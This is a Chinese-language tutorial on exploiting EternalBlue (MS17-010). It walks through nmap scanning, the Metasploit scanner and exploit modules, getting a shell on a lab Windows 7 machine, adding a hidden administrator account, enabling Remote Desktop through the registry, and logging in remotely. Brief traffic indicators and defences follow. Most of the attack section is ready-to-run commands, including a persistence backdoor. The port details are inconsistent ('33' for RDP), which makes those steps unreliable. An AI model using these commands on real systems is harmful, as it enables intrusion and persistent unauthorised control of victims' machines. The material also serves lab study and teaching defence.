1.永恒之蓝简介
爆发时间:2017.5.12
端口:tcp的445端口和139端口
影响版本:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
2.原理
永恒之蓝漏洞通过TCP的445和139端口,利用SMB1和NBT中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的win主机,进行勒索病毒、挖矿、反弹shell等
3.SMB协议
SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;可以用在TCP/IP协议上,SMB使用TCP139端口和TCP445端口
4.模拟攻击准备
条件:两台机子互相之间可以ping通,并且靶机打开了445端口,防火墙是关闭的
5.模拟攻击步骤
1.提权
2.探测网段内存活的主机
nmap -sP 10.0.0.1/24
3.查看目标主机的端口开放情况
nmap -sT 10.0.0.8
看到445端口确实开放
4.使用MSF的永恒之蓝模块
msfconsole
每次打开都会加载一个随机界面MSF
5.搜索ms17-010代码
search ms17_010
永恒之蓝扫描模块:auxiliary/scanner/smb/smb_ms17_010
永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
6.使用MS17-010的扫描模块,对靶机进行扫描
use auxiliary/scanner/smb/smb_ms17_010 / use 1
7.设置目标IP或设置网段
set rhosts 10.0.0.8
8.执行扫描
run
9.使用MS17-010的攻击模块,对靶机进行攻击
use exploit/windows/smb/ms17_010_eternalblue / use 2
10.设置攻击目标IP或设置攻击网段
set rhosts 10.0.0.8
11.执行攻击
run
12.得到靶机shell
shell
进入win7的终端
13.通过靶机对shell进行控制
1.解决乱码
chcp 65001
2.创建新用户
net user $用户名 密码 /add
$是创建隐藏账户
3.将用户添加到管理员组
net localgroup administrators 用户名 /add
4.查看端口开放情况
netstat -ano
5.开启33端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
6.远程连接主机
33端口开启后,重新打开一个命令行窗口
rdesktop 10.0.0.8:33
输入前面添加的隐藏账号: $scyh
密码: 123456
6.流量特征
1.会出现卡顿、耗电提高、收到勒索信息、服务器拒绝服务等特征。
2.在告警设备上可以看到多次告警提示,攻击者首先会探测主机、端口扫描,这些都会告警,其次会出现SMF利用告警、getshell也会告警;除此之外可以查看端口开放情况、外联情况;以及查看日志...
7.防御
1.关闭文件共享;
2.不要随意打开陌生的文件;
3.禁用SMB1协议;
4.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接;
5.安装杀毒软件,可以通过杀毒软件的安全检测来帮助我们来抵御黑客攻击的危害,及时更新病毒库。
